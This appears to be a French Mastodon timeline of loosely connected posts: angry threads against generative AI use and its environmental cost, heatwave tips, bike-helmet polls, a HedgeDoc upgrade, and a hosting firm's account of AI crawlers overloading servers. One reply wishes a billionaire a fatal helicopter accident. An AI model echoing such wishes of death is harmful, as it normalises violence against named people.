Littéralement tous les usages que les gens ont des IAgen peuvent être remplacés par autre chose, ça n'apporte rien, seulement l'illusion de maîtriser, ça empêche d'acquérir de vraies compétences, ça creuse les inégalités, ça s'infiltre jusque dans les loisirs (vous savez, ces trucs qu'on fait pour se distraire et se satisfaire d'accomplir des petits machins par soi-même) mais quand j'aborde le sujet, je me heurte à un mur.
Même chez mes amis.
Même chez des gens que j'estime plus que tout.
Ça me met dans un état de détresse et de rage assez incroyable.
Et face aux arguments écologiques / éthiques tout ce que je reçois comme réponse c'est "ouais mais bon... tu sais les grosses boîtes s'en servent alors bon nous à notre niveau ça change rien"
Alors que justement ! Si on n'arrive même pas à faire ce minuscule effort (qui de mon point de vue n'en est pas un, hein) de NE PAS se servir de l'IA, comment voulez-vous qu'on fasse des efforts sur le reste ? Sur la bagnole ? Sur la conso de viande ? Sur la sobriété des modes de vie ?
On est baisés, la mastouille. On est complètement baisés.
@vilain moi je réponds : l'avion aussi, c pratique. Mais on préfère prendre le train quand même
@sarah_trichet_allaire @vilain Je cherche un trajet pour les galapagos... Pas trouvé sur 1.2. train...
@Lefoyenlibre @vilain Si y'a besoin, ok. Mais bon, c'est comme l'IA : à quel point en a-t-on vraiment besoin ?
@sarah_trichet_allaire @vilain En fait la question n'est pas les Galapagos ou non, mais les injonctions yakafokon...
@vilain C'est la noyade.
Et si encore je voyais une démarche d'usage avec parcimonie (comme pour l'avion ou la voiture, parce que parfois c'est juste infaisable sans et t'as pas le choix). Mais non, c'est rien à foutre. J'ai une impression qu'on est passé en quelques années de "faut s'activer contre le réchauffement climatique et faire les colibris" à "rien à battre, c'est cuit de toute façon, YOLO".
Et j'en suis à regretter les colibris inutiles (cette situation est la preuve de leur inutilité)
@vilain et sur l'usage incontournable des IAgen, je vois un cas vraiment pénible dans notre taf : les libraries qu'on utilise depuis longtemps et qui sont de moins en moins documentées. L'enfer, obligé de taper dans deepwiki et ça me tape sur les nerfs.
@adarr_volte Ouaip, les usages les plus "mesurés" que je constate dans mon entourage c'est que des trucs de ce genre : des archives mal foutues, des références obscures, alors on demande à une IA d'aller chercher parce que ça va plus vite, alors que si je ne m'abuse c'est surtout un problème d'entretien et de référencement.
@vilain c'est pervers, plus il y a d'IAgen partout, moins on référence, moins on documente. C'est infernal.
@vilain ça me rend dingue…
@besnehard @sknob @vilain j'en suis pas tout à fait là mais pas loin.
@vilain je crois que le pire que je vois ce sont ces managers qui imposent à leurs équipes de l'utiliser.
L'equipier n'a même plus le choix. "Non mais il y a un problème de méthodologie tu files ça à l'IA et en 2 secondes c'est fait..."
On regarde pas si c'est bien fait et encore moins comment c'est fait.
Ton boss il a trop peur de passer pour un looser.
@vilain Je pense que, sur le principe, il faut "démontrer" que ça marche, un peu comme pour l'agilité : on l'applique sur une équipe qui est convaincue, on fait le bilan, on montre ce que l'on a gagné à faire sans, et naturellement, ça gagnera les autres équipes.
non ?
a repartagé@vilain les personnes qui ne comprennent pas que pour que les changements sociétaux prennent, il faut aussi les changements à petite échelle, et que la plus petite échelle qui soit, c'est soi-même, c'est un peu désespérant
@adhemara je suis d'accord. Il y a un espèce de sous-texte à la critique systémique qui est reçu comme "bon ben c'est pas de notre faute alors on va faire aucun effort".
@vilain Tout à l'heure, en passant devant la salle de pause au boulot :
- L'usage de l'IA, ça aide pas pour diminuer les gaz à effet de serre.
- Mais justement, on pourrait utiliser l'IA pour lui demander comment diminuer ça.
Je sais plus quoi faire…
@vilain ça me fume toujours cet argument. "Faut réguler pour que ce soit interdit, c'est pas à nous de le faire". Mais si tu veux que ce soit interdit, comment tu peux justifier de t'en servir du coup ?
Je viens d'avoir cette réponse ("l'empreinte écologique de notre usage de l'IA est dérisoire à côté de celle des grosses entreprises") de la part de responsables d'organisations militantes qui ont littéralement passé leur vie à récuser cet argument à propos des pesticides et du dérèglement climatique.
Donc en fait il sont conscients de notre responsabilité politique (et ils font des efforts) sur certains sujets écolos, certes ultra-importants, mais pas sur d'autres. Comme ça, à la carte. "Puisque ce truc là me plaît, je vais utiliser un joker d'incohérence".
Gros, gros soupir.
@vilain ah bah je fais figure de vieille archaïque avec les mêmes discours. dans ma boite ils sont tous à fond IA, j'attends le moment où ils vont avoir besoin de demander à l'IA s'ils doivent aller au chiotte, je pète des câbles
@vilain un peu pareil, avec heureusement peu d'amis très enthousiastes (mais j'ai peut-être trop peu d'amis tout court).
Et le parallèle avec la voiture est bon, sauf qu'on est au stade où tout n'est pas encore organisé autour. La voiture fait bien ce qu'elle annonce, avec plein d'externalités, et si on devait maintenant choisir à partir de rien entre une organisation autour de la voiture ou non, avec nos connaissances de ce que ça implique, j'arrive à croire qu'on ferait sans. Là on est en train de s'organiser autour de l'IA gen alors que c'est encore facile de s'en passer, on fonce dans l'impasse c'est terrible.
@BrKloeckner Je te jure je vois le mur arriver mais c'est pas moi qui conduis le bus et tous les passagers chantent "plus vite chauffeur"
@vilain c'est globalement mon ressenti aussi, donc soutien. Y a un peu ce côté d'être en décalage avec son entourage par rapport à l'IAGén. Et en plus pour moi qui apprécie le travail du doublage dont le milieu alerte depuis des années sur ce sujet, j'ai un peu l'impression d'une force irrésistible alors que c'est justement le moment de se positionner fermement sur ses utilisations.
@vilain tant que l'IA gen restera gratuite ça n'est pas prêt de changer. Pour certains usages, pas sur qu'elle soit complètement hors des clous comparée à l'ancien monde.
@arabine @vilain Je suis d’accord, le soucis c’est pas si c’est utile, (oui dans certain cas), c’est si le prix est un bon signal pour décider quand l’utiliser, par ce que le fond du débat dans ce genre de fil, c’est la culture, et pourquoi elle semble pas en mesure de freiner l’adoption (sauf chez les gens les plus sensibilisés, dont il y a un paquet sur ce réseau, qui est très politiquement marqué, disons, mais même ici, c’est loin de l’unanimité). Le fait que l’usage est quasi gratuit, les entreprises engloutissant des milliards par mois pour permettre ça, et que même si elle faisaient du bénéfice dessus, ça ne tiendrait pas compte des externalités, fait qu’on va s’en servir pour tout et n’importe quoi, et parfois en pur gaspillage volontaire, quand les entreprises nous juge sur le nombre de tokens utilisés plus que sur la productivité, et que les gens pensent à leur bonus, mais y’a aussi des cas ou en terme d’énergie, ça compare avantageusement à des requêtes google à l’ancienne.
@vilain je suis désespéré.
Aucune réflexion, sur aucune des problématiques liées aux IAg. Je suis déçue par énormément de monde.
Même ma cheffe, pourtant hyper convaincue à titre personnel de la merde que c'est, commence à y réfléchir sur le plan professionnel...
@vilain On est dans la même équipe. J'ai la chance d'avoir très peu de gens autour de moi qui utilisent l'AIgen mais je n'en peux plus. C'est moche et nul et inutile et je ne comprends pas comment les gens peuvent être aussi paresseux et avoir aussi peu envie de vraiment créer des choses. Ca me donne envie de crier.
@sorcieremisandre @vilain
Je suis d'accord.
Ça me rappelle ce parti politique qui a fait usage de l'IA gen d'un néo-nazi pour faire une affiche contre l'extrême droite mais qui reprend les codes du nazisme.
Qui aurait pu prévoir ?
@vilain Les IA génératives c'est marrant deux minutes, mais en vrai ça te vole LA partie intéressante de l'acte créatif ! Donc ok, un non-musicien pourra faire une chanson facilement, un non-dessinateur pourra faire une illustration – le tout, d'une qualité pour laquelle ils ne pourraient ni payer, ni investir des années d'entraînement. Mais le plaisir créatif, je crois que ça sera toujours sans IA pour les gens que ça intéresse *à titre personnel*. (…)
@vilain Allez courage, au moins t'es pas seul.
(moi je fais de l'embarqué critique le chef veut pas que je m'en serve donc j'ai la paix, mais pour tous les autres devs, son argument alakon c'est "on sera pas compétitifs en appels d'offres si on s'y met pas alors que les autres s'y mettent"
on a pas fini d'en chier, dès que ca cause entreprise, la morale et l'éthique disparaissent entièrement.
Quand aux glandus qui aiment regarder des chats qui font du kungfu en pantoufles... y'a aucun espoir.
@vilain Ah le coup du "C'est bien pratique"!
1) imagine si en plus de tuer, de polluer, d'endetter, c'était même pas pratique ou utile!
2) évidemment que ça va être pratique si tu construis toute la société autour de la voiture 🤦♂️
@vilain
Dans mon taf (Orthophoniste), c'est l'hallu aussi.
"c'est bien pratique pour rédiger les comptes rendus". Ça me rend fada.
Et aucun argument ne fonctionne : qu'il soit écologique, éthique, social, démocratique.
C'est soit on te considère comme un antiprogrès, soit t'es alarmiste, soit "tout le monde le fait de toute façon".
Déni total et ignorance crasse des enjeux cachés.
Et je ne parle pas des visuels dégueulasses qu'on nous impose partout. C'est moche et uniformisé.
Vivement l'effondrement.
@vilain et qd je leur dis "vous le précisez sur vos CR que c'est rédigé avec l'aide de l'IAg ?", ça les fait rigoler.
Je les hais si fort.
Franchement, ne pas dire aux patients que c'est une machine qui a pondu un CR médical ou paramédical, je considère ça comme un manque absolu d'éthique et de transparence.
@vilain et aussi qd je propose à celleux qui refusent l'IAg dans leur profession d'ajouter un sticker "rédaction garantie 100% sans IAg", celleux qui l'utilisent m'accusent de vouloir "diviser" les professionnels.
C'est juste dingue.
Je fais souvent aussi la comparaison voiture/IA, à mes moments les plus pessimistes : si l’IA c’est comme la voiture y’a 100 ans, vu le succès de la voiture et ses dégâts permanents sur l’environnement, les vies, l’aménagement des villes et campagnes, la vie quotidienne et ses attentes, la culture qui s’est créée autour, etc, on est mal barrés.
C’est plus optimiste de faire la comparaison avec le métavers ou la crypto, mais malheureusement on a l’air d’avoir dépassé cette portée.
@vilain Oui. Pareil.
Je fais le constat qu'on se méfie. est-ce le capitalisme qui a détruit la confiance. Est-ce les marques ?
On préfère posséder une voiture que de faire confiance aux taxis ou partager un transport en commun.
On préfère utiliser une IA plutôt que de contracter avec un graphiste, ou un auteur, une secrétaire, un assistant, un traducteur.
C'est fou, non ?
Ce n'est pas par praticité, mais par peur, en fait ! Peur de se faire arnaquer. Peur de créer du lien. Du lien commercial
En fait, si mon téléphone sonne, c’est uniquement pour m’arnaquer.
Pareil si on sonne chez moi.
En magasin, même en lisant les étiquettes avec une loupe, on sait qu’on va se faire arnaquer parce qu’en face une bande de markéteux empile les méthodes de mafieux pour t’extraire la moindre goutte de profit, soit en remplaçant de bons ingrédients par de la merde, soit en gonflant l’emballage, soit en réduisant les portions, le plus souvent en empilant toutes les arnaques.
@vilain pourquoi essayer d'avoir des réponses médiocres et bienveillantes avec de l'ia quand il suffit d'affirmer un truc faux en ligne et avoir des gens qui s'y connaissent qui te corrigent gratuitement 😹✌️
@vilain la différence c'est qu'on n'a pas encore construit un monde dépendant de l'ia (par rapport au moment où ta grand mère t'as dit ça où c'était déjà fait)
@vilain Les gens qui utilise a.i pour le photo profil et autre. Je suis d'accord. Mais l'a.i utiliser correctement peu littéralement rendre notre monde plus propre. On arrive a utiliser 100× moin de ressources grace a des découvertes de l'a.i sur des milliers de domaines. On est qu'au début. Et j'ai 42 ans jamais eu le permis, 20 ans sans viande et je ne voyage pas en dehors de mon canton.
Si la réponse est oui, je pense que vous faites partie du problème, merci de ne plus me suivre.
@oldsysops Ca a été mon activité de l'après midi aussi (me battre contre des bots d'IA), pour l'instant j'ai gagné (satisfaction).
Dans les externalités négatives également, ça "encourage le délestage cognitif"
https://arxiv.org/pdf/2506.08872
(attention l'étude n'est pas peer reviewed)
@oldsysops je suis entièrement d'accord avec toi, mais que répondre a un chef qui me dit "oui mais si on fait pas de l'ai pour coder on sera plus compétitifs et on va perdre les appels d'offres parce que d'autres le feront" ? la morale n'a aucune emprise sur les entreprises (et non changer de boite ne changera rien ni pour moi ni pour quiconque - en attendant je refuse de m'en servir tant que c'est pas imposé)
@oldsysops Trois ans ? Oui, c’est en gros aussi le temps que je laisse aux humains pour continuer à exister (c’est fou, mais je ne parviens pas à nous imaginer être encore là en 2030 et après).
Achat d'un SSD Samsung EVO 970 1To chez Inmac :
Février 2025 : 99€ HT
Mars 2026 : 210€ HT
Juin 2026 : 425€ HT
Tout
Va
Bien.
@Beryl @oldsysops @TritTriton hé ben, mon 2to acheté lannee derniere n'a pas intérêt à me lacher >< (comme tout le reste de mon ordinateur d'ailleurs)
@oldsysops "Si la réponse est oui, je pense que vous faites partie du problème, merci de ne plus me suivre." This!
@oldsysops Dans une de nos salles, une "machine à GPU" a claqué un ventillo, donc tous les autres sont à fond. On l'entend hurler à des dizaines de mètres même après avoir fermé 2 portes. C'est pourtant une relativement petite machine. Je propose de la déplacer dans le salon/chambre/bureau de toute personne qui trouve que l'IA c'est génial / pratique pour ne pas avoir besoin de faire l'effort de penser par soi-même. Et ça me laissera suivre des collègues désabusés 🙂
Alerte canicule dans toute la France ! Les plus hautes températures jamais enregistrées...
Toute ?
Non.
Un irréductible département reste sous la flotte ! 😂
#LeNord
merci d'envoyer un message a tous vos oncles et tante de droitepoue leur rappeller que ce mois de juin est la conséquence des politiques des 30 dernières années et qu'on compte sur eux pour changer leur vote maintenant que c'est un peu trop tard...
bonne journée
@oldsysops du coup j'ai regardé la météo à Dunkerque : je propose une immigration massive chez toi tous les étés
Les chercheurs ont divisé par deux leurs vols professionnels sans y être contraints
https://theconversation.com/les-chercheurs-ont-divise-par-deux-leurs-vols-professionnels-sans-y-etre-contraints-282805?utm_source=flipboard&utm_medium=activitypub
@ConversationFR « Plusieurs facteurs peuvent être en jeu pour expliquer nos observations : les effets durables de la pandémie sur l’offre et la demande en déplacements, la généralisation et la diversification des usages de la visioconférence, la hausse du prix des billets d’avion et de train, mais aussi la diffusion progressive de nouvelles normes de sobriété dans le monde académique. »
Euh, aucune mention que pour la première fois, toutes les universités françaises ont dû voter des budgets en déficit ? L’État qui sabre les budgets de l’#ESR, vous ne voyez pas ça comme une contrainte ??
ah oui, ca marche ici aussi...
Dernier stade de Don't Look Up : le technosolutionnisme de la startup nation
@oldsysops https://social.dk-libre.fr/social/oldsysops/p/1781940610.943160
@mehdi_benadel @oldsysops je sais plus qui disait ça mais ça fait un peu "c'est un effort que je suis prêt à faire" en parlant de sacrifier la vie d'êtres humains. 💀
bref des personnes qui sint a l'abris (du besoin ou des risques) qui demande des efforts a d'autres qui sont en train ou vont souffrir...
ca me fait penser que notre système n'est plus adapté (ou plus démocratique).
a repartagéI have real difficulty seeing this "post-scarcity" society that some talk about. All I see is vast, unprecedented wealth concentration. I call total bullshit on this https://en.wikipedia.org/wiki/Post-scarcity
ok so the charitable interpretation is that "post-scarcity" is indeed total bullshit, but "fighting specific artificial scarcities" is defensible:
@oldsysops tu fais pousser du pavot ?
@oldsysops tu t'en sers pour agrémenter tes salades au moins ?
@oldsysops
A quand un accident d'hélicoptère utile cette fois-ci ?
On le pleurerait tous...
D'ailleurs c'est étrange que le "digital potential is infinite" a... surtout le potentiel de le rendre encore plus riche :/
@oldsysops
Il le dit à haute voix pour influencer LED décisions politiques et l'esprit des gens.
Les personnes comme lui savent qu'elles ont de l'influence et n'hésite pas à s'en servir :/
@oldsysops tu as la source ? parce qu'il y a déjà eu un transcript de Jeff avec des propos équivalents halluciné par une IA
@oldsysops Entre les hallucinations des IA et le fait qu'il aurait pu sortir un truc pareil, c'est pas facile de suivre l'actualité.
@oldsysops sounds like a sociopath to me!
In the “gotta love some software” department: I deployed a @hedgedoc instance manually a long while back (3 years), and it's been left untouched since then (woops). Beside some fun related to `yarn` being available as `yarnpkg` (which a symlink makes disappear trivially), it was only a matter of stopping the server, fetching/switching to the latest tag, running `bin/setup`, checking the configuration file for peace of mind, and starting the server again.
I realize all of this might seem a little trivial, but straightforward upgrades, across that many versions (from 1.6+ to 1.11.0, in one go), are definitely not something so easy in the general case (even with a default configuration)… and that's very much appreciated!
Thanks & good job, @hedgedoc!
@hedgedoc That being said, while the upgrade itself seemed to run smoothly, my browser can only see the history of modified pages. Trying to access any one of them leaves me with a spinner, and the network inspector reports many 400 errors on the `/socket.io` endpoint, apparently with “Unsupported protocol version”, so the fun continues…
📣 PROGRAMME : Les Forgéales #1 📣
⚙️ Les Fabrique-Party
-> des visio pour explorer l'envers du décor, les coulisses de création de ressources, ou se former pour monter en compétence !
Le vendredi 26 juin, de 19h à 20h, retrouvez plusieurs ateliers en parallèle : à vous de choisir celui qui vous intéresse (les autres seront en replay 😉) !
📅 Programme complet et lien de connexion sur le site https://edurl.fr/forgeales
"Empaquetez votre travail sous GNU-Linux"
👤 Georges Khaznadar
🗓️ vendredi 26 juin de 19h à 20h
Un jour, j'ai fait éclater de rire tout mon syndicat en disant bijection (parceque j'ai parlé comme si c'était un mot évident)
Et comme ils m'ont demandé ce que ça voulait dire, j'ai fait un p'tit dessin avec des patates et des éléments dans les patates.
@ciredutempsEsme les gens comprennent mieux quand on dit « correspondance biunivoque » à l’ancienne !
N2 et le rituel de la pizza maison du samedi soir. Ce matin :
Moi : on va pas faire pizza ce soir, j'allume pas le four avec cette chaleur.
N2 : il suffit de le mettre dehors.
Moi : mais on va pas avoir envie de manger chaud ?!
N2 : bha on fait pizza froide !!!
Moi : ... Ok.
Donc ce soir pizza cuite juste avec la sauce tomate et on ajoute une demi burrata, du speck, de la salade, huile d'olive et vinaigre.
Elle a encore gagné !
@oldsysops oui, elle commence à m'énerver un peu.
Je vais la renvoyer chez sa mère.
(Miam pizza !!!)
@arthurr @oldsysops et du coup, pour cuire la pâte, tu l'as étalée et tu l'as mise dehors 😊
@clement_moignard presque... J'ai sorti le four à pizzas électrique.
Je me suis dit que je pouvais réchauffer un peu le dehors 😁 @oldsysops
@arthurr
On a eu les mini pizzas congelées cuites au four pour l'#apérociné du samedi parce que de toute façon j'ai fait cuire une tarte au citron d'anniversaire, donc le four était déjà en route (j'avais initialement prévu des toasts de tapenade)
@Galamadryade le four à pizza électrique a été allumé dehors.
Fait trop chaud ici pour allumer un four sans mourir 😋
y a pas que de la musique à la #bonneAventure #Dunkerque
Dites, vous survivez comment à la chaleur ?
| avec ventilateur: | 63 |
| avec la climatisation: | 15 |
| quelle chaleur ? Je suis en Bretagne.: | 11 |
| Sans rien: | 52 |
Terminé
@dada
J'ai Bobby (pas le nom d'un produit, juste je l'ai nommé lol) mon mini ventilo USB juste en face de moi sur le bureau. Bobby n'est allimenté que par des powerbanks que je recharge uniquement au (petit) panneau solaire de camping au bord de la fenêtre en revanche. 🖖🏼
Parlons-en de ces chargeurs solaires... Enfin, de ceux trouvés chez action et que j'ai essayé (par nécessité) à la fin du mois dernier. J'ai trois modèles dont un avec powerbank.... Bah, ça bank pas des masses. C'est un peu comme des piles achetées parce qu'on te dit qu'elles sont rechargeables mais, en vrai, ça ne stocke rien du tout.
Ou alors - et cette piste est tout à fait crédible - je ne les ai pas utilisés correctement lors de la mise en route et de la première recharge
@dada
Je ne cesse de me féliciter que notre immeuble, le seul de toute la résidence, a voté il y a plusieurs années des travaux très importants pour l'isolation mural+caves+toit par l'extérieur.
Ça nous a coûté un rein, mais ça nous sauve la vie, clairement.
@dada
Je ne sors pas.
J'ai 24° en haut et 21 en-bas alors ça va
@syll Oh, c'est beau comme température !
@dada
Tu as plus dans ta maison ?
@syll 29 dans la chambre, sous le ventilateur
@dada
Le seul vrai effort que je fais c'est de vivre dans la pénombre. A force c'est pénible mais ça porte ses fruits alors je m'y fais
@angedestenebres @dada
Mes murs sont épais mais je sens la chaleur qui descend du grenier qu'il faudrait que j'isole justement. Je fais super gaffe. Tout est fermé. Cette nuit je me suis levée à4h pour ouvrir et à 7 pour fermer. Je n'ai même pas ouvert en-bas, il faisait plus chaud dehors. En-haut j'avais 25 hier soir, je suis redescendue à 24 en ouvrant, pas ouf'
@dada
avec 30° dans l'appart, j'ai investi dans 2 ventilos Rowenta silencieux. Les nuits sont plus agréables, ou en tout cas moins pénibles, depuis.
@dada reponse E : ici, on a des températures de saisons*... pour le moment. Les mesures habituelles semblent suffisantes.
Merci la mer !
* de la dernière décennie
@dada En Bretagne Sud y cagne pas mal aussi
-Draps blancs tendus sur les façades sur laquelle ça tape (par ce qu'en intérieur la chaleur est déjà rentrée..🙄)
-Pulvérisateur à pression prealable (neuf sinon dangers avec les residus de pesticides) de 1,5L que j'emporte partout, je spray régulièrement aussi les lits, sièges de voiture (que j'ai eu la chance de pouvoir acheter de couleur claire!)
-Ventilo, la nuit ça tire de l'air frais de dehors par la fenêtre avec un tunnel à chats (tuyau avec ressort) et fait passer tout l'air frais à travers la maison en commençant par la chambre.
Quand le bruit dérange je fais l'inverse, avec un ventilo au fond dla maison
Last few days to contribute to the social capital of #SailCoop, a really cool #CoOp based in #France that offers sailboat trips (Brittany, Corsica, #Baltimore!) ⛵
Je n’en peux plus des phishing de tests du RSSI de mon taff… on en est rendu qu’il m’en veut d’avoir des outils qui bloque ses domaines de merde, parce que « tu joues pas le jeu, tu contournes »
Non, mais on est où là ? 🙄
@Sp3r4z Tu ouvres pas les mails de phishing, donc c'est quand même une bonne chose :D
J'avoue que j'aime pas ce genre de tests, mais j'ai vu récemment que les vrais mail de phishing sont aussi claqués au sol donc bon....
@vinishor on me rétorque que c’est pas bien, que ça m’habitue pas, etc.
J’ai encore plus strict chez moi, j’ai encore plus de filtres et des anti SPAM plus intelligents…
J’aime pas du tout ces pratiques, même si je comprend la nécessité de s’améliorer sur ça 😕
@Sp3r4z façon, si ton équipe sécurité se fécilite de mettre des repos Github en internal ou privé, tu sais que tu feras mieux qu'eux xD
@oldsysops faut croire que c’est pas drole pour eux, parce qu’ils peuvent pas attraper certaines personnes. 🙃
( je me déteste de savoir ça)
@oldsysops Sauf que 0% c'est nul comme pourcentage (à mon avis), parce que ça démontre pas qu'il est utile…
I visited the Helsinki Library and it has a frigg'n makerspace in the middle of it! Laster cutters, 3D printers, Vinyl cutters, all for nearly free. It also has "video game rooms", general meeting rooms, 2 cafes and a restaurant! It's astounding what you can have if you fund public works.
@FdC Jamais. Je préfère avoir une barre de métal de 93cm pour écarter les voitures.
@aaaabbbb une photo ?
@aaaabbbb ah oui, impressionnant 😁
Personne n'a jamais touché ?
@FdC Pas sur celle-ci mais l'ancienne qui était en aluminium et plus courte s'est faite défoncer par une voiture.
Celle-ci est en acier avec une pointe découpée à l'avant.
Je ne la mets pas toujours —c'est difficile de prévoir de quel département est la voiture derrière.
@aaaabbbb et toi, tu n'as jamais rien tapé ?
J'ai impression qu'elle se replie en cas de choc avant ?
@FdC il manque 'souvent'
@FdC Toujours, mon approche du vélo venant du VTT je me sent exposé quand j'en ai pas. J'ai l'impression que rouler sans casque sur la route c'est plus dangereux que descendre des escaliers en vélo.
@schumptoum même chose ici. Avec mon premier casque acheté par ma maman, je suis tombé à l'arrêt, la tête pile sur une pierre. Casque fendu en 2 😱
Je ne suis jamais sorti sans depuis, sauf bref passage à Paris, lors de mes trajets en Vélib...
@FdC Le casque fendu en deux ça rappel qui faut toujours changer de casque après un choque a la tête.
@FdC VTT de descente/enduro pour moi, alors impossible de m'en passer. J'ai exceptionnellement retiré la mentonnière samedi dernier à cause de la chaleur.
@FdC
VTT : systématiquement (intégral)
Ville pour trajet taf : (presque) toujours
Ville pour autres déplacements : rarement
@FdC j'ai mis toujours mais, mais c'est toujours sauf l'été, ou c'est toujours avec les voitures et sur les pistes cyclables en site propre je zappe parfois.
@FdC je n'en mettais jamais avant d'avoir des enfants, ensuite je l'ai mis pour montrer l'exemple, maintenant je le mets par habitude et les rares fois où je ne le mets pas je me sens tout nu 😁
@FdC Je trouve que poser la question de cette façon-là, c’est trompeur (ou une façon de fustiger le non port du casque en vélotaf ?).
En vélo sportif : oui, bien sûr, le casque est indispensable — que ce soit en route, gravel, VTT, DH, BMX, il y a des risques de chute, et le casque protège bien.
En vélotaf : le risque n’est pas la chute, mais la collision avec un véhicule motorisé. Et là, un casque de vélo ne sert à rien, ou si peu.
@fabi1cazenave tu as sans doute raison, mais il y avait trop de possibilités pour les 4 options possibles sur mamot 😬
Pour le vélotaf, il aurait fallu distinguer l'urbain du rural...
@FdC « Je suis vélotaffeur et je porte un casque ? » aurait été une question valide.
(Pas sûr de saisir la diff entre le vélotaf urbain ou rural, pour le coup ?)
@fabi1cazenave ben quand j'étais à Paris, je ne portais pas de casque en Vélib. Là ou j'habite aujourd'hui, je le mets toujours : ca monte, ca descend, les routes sont étroites, zéro aménagements cyclables, le voitures te frôlent plus que de raison...
Pas encore tout à fait la campagne, mais ce n'est clairement pas la ville...
@FdC Là tu as l’air de surtout décrire un souci lié aux voitures, et je crains fort que le casque vélo serve plus à se rassurer qu’à se protéger en cas de contact.
Sinon oui, s’il y a des pentes susceptibles de t’emmener à des vitesses élevées, le casque est indispensable — mais là encore, c’est pas lié au fait d’être en milieu urbain ou rural, àmha. (Souvenirs des pentes de Fourvière et de la Croix-Rousse à Lyon…)
@fabi1cazenave les 2 mon capitaine 😂
Ce sont bien les voitures le problème et je suis bien conscient que le casque ne sert à rien dans ces moments là 😬
Mais c'est aussi vallonné avec de bonnes vitesses atteintes
@FdC parfois = quand je dois rentrer tard du taf. je me méfie de la fatigue et si je rentre tard c'est aussi que c'est une soirée à événement donc je me méfie aussi du chaos urbain.
@FdC J'ai répondu parfois car je poste un casque systématiquement pour le vélotaf (entre chez moi et la gare de mon patelin).
Je ne le porte pas dans mes déplacements pépères ...
Ma réponse précise serait donc "la plupart du temps".
Je porte plus mes gants que mon casque en fait ...
@FdC je booste mais ça ne sera représentatif que des mastonautes qui suivent des comptes vélos.
Pour rappel sur la population générale
https://www.ecologie.gouv.fr/actualites/enquete-2024-35-francais-pratiquent-velo-moins-fois-mois
@FdC Je suis pas cycliste, je fais du roller, mais je porte toujours un casque, est-ce que mon vote compte ? 
@FdC Je porte un casque depuis que je fais du vélo avec un potibébé casqué dans la carriole, parce que je me vois pas lui expliquer qu'iel doit en mettre absolument un par sécurité alors que moi c'pas la peine.
Mais c'est clairement plusse pour l'exemplarité que par conviction personnelle.
@FdC [x] Souvent.
Plus que parfois, mais pas strictement toujours. Encore que depuis le déménagement, quasiment (je fais moins de trajets ultra-courts ou improvisés que que quand j’étais en ville).
@FdC Une étude intéressante dit que 47% des tués à vélo portent un. casque alors qu'ils ne représentent que 22% des cyclistes.
Bien sûr, les choses sont plus compliquées. Même si "il y a plus de tués ou de blessés chez les cyclistes casqués", la relation de cause à effet n'est pas démontrée.
Je trouve qu'il manque d'études sur la pratique du vélo pour objectiver ce qui est accidentogène, les type de blessures, la localisation des blessures, les causes de la gravité des blessures, les séquelles, qu'est-ce qui protège…
Par exemple, le casque fait porter sur le cycliste seul la responsabilité de sa protection, alors que les pistes cyclables (les vraies, séparées de la circulation) sont une infrastructure sociale qui protège bien plus efficacement cyclistes et autres usagers (tricycles, fauteuils roulants, etc.).
@antondbzh @FdC Après avoir lu ces statistiques j'en conclus que le casque protège le cycliste qui rate une bordure de trotoir mais pas celui qui se fait ramasser par une voiture. J'ai aucun argument pour le prouver, c'est une théorie personnelle. Et vu que je me prend (trop) souvent les bordures de trotoirs, je porte un casque.
@just_chill
Un casque est prévu pour absorber l'énergie d'un choc très faible en comparaison de ce que représente une voiture qui heurterait un cycliste. Quelqu'un avait donné des chiffres mais je ne sais pas si c'était du vérifié ou pifomètre...
@antondbzh
@FdC Asso Avello en Belgique (extrait).
"Le cycliste n’est pas davantage sujet aux traumatismes crâniens que les automobilistes ou les piétons. Imposer le port du casque aux autres usagers permettrait tout autant de sauver des vies, or il n’en est jamais question. Alors pourquoi viser spécifiquement les cyclistes ? En fait, il n’y a pas de meilleur défenseur de l’obligation du port du casque que… le lobby automobile."
C'est "un peu" le feu dehors mais j'ai réusi à dormir.
@Steve12L ici, les "pompiers" sont en train d'essayer d'éteindre le "feu" , avec "sirène" et "gyrophare" ...
(Il pleut, avec de l'orage, pour celleux qui n'auraient pas compris)
@guepi Il pleut chez toi ?
@Steve12L yes
@oldsysops @Steve12L dans le pas de Calais, ouais, mais il y a quelques gouttes de pluie et pas mal de tonnerre, mais il y a encore du soleil
Chez noesya, Numérique : l’ère du soin
https://lab.noesya.coop/publications/2026-05-27-numerique-lere-du-soin/
Chez Octopuce, on infogère des serveurs, et on surveille de près leur activité pour s’assurer qu’ils fournissent les pages web de nos clients dans les meilleures conditions. Une page web, c’est un gros bloc de HTML, le plus souvent calculé par un logiciel côté serveur (wordpress, symfony, python …) et des tas de petits fichiers statiques (js, css, jpg …). Le plus souvent, chaque calcul de page HTML prend un peu de ressource sur le serveur : des cycles CPU, de la RAM, quelques requêtes sur une base de données (Mariadb, Redis …). On doit donc s’assurer au maximum que les visites sur les sites de nos clients sont légitimes : si quelqu’un fait trop de visites illégitimes sur un site, cela consomme des ressources et peut ralentir sérieusement le service des autres internautes.
Jusqu’à 2023, le web était, finalement plutôt calme : si quelques robots d’indexation de site passaient régulièrement et légitimement sur nos serveurs (googlebot, bingbot essentiellement, et quelques autres) ll arrivait qu’un robot plus zélé ou moins bien codé qu’un autre (oui, on parle de toi Ahrefsbot, mais tu n’es pas le seul, loin de là !) doive être bloqué par notre équipe pour éviter de ralentir un serveur d’un client.
depuis 2023, et les délires industriels mondiaux de l’IA, nous avons vu arriver des nouveaux bots bien mal codés, aux profils de comportement très divers. Peu à peu, certains serveurs de nos clients (souvent les moins optimisés) se sont vus saturés, CPU et RAM au taquet.
Au début, nous arrivions à comprendre ce qu’il se passe : un robot passait, d’un genre nouveau (GPTBot et consorts) et ne sachant pas bien « crawler » les sites web, se retrouvait à aspirer en boucle des milliers de sous-sous-page d’un site, des lieux ou personne n’allait d’habitude, défiant les caches de nos clients et nécessitant beaucoup de ressource. Pas grave, on a l’habitude : on bloque sur la base du « User-Agent » (le nom que le robot annonce quand il vient aspirer la page) et tout va bien.
